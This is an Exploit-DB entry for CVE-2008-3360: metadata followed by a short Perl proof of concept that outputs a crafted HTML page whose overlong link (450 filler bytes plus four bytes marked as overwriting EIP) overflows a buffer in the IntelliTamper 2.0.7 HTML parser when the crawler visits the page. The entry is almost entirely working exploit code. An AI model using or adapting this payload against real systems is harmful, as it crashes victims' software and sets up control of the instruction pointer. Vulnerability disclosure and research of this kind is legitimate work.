IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)

Author: Guido Landi
type: dos
platform: windows
port: 
date_added: 2008-07-20 
date_updated:  
verified: 1 
codes: OSVDB-48285;CVE-2008-3360 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comintellitamper_v2.07.exe

#!/usr/bin/perl
#
# k`sOSe - 07/21/2008
#
# This is NOT http://secunia.com/advisories/20172/.
# There are some BOFs in the html parser, just put a properly
# formatted html file in your website and launch IntelliTamper against it.

use warnings;
use strict;

my $evil_html   =       '<html><head><title>ph33r</title></head><body>' .
                        '<a href="http://google.it/' .
                        "\x41" x 450 .
                        "\x42" x 4 . # EIP
                        '.htm">ph33r</a>' .
                        "</body></html>";

print $evil_html;

# milw0rm.com [2008-07-21]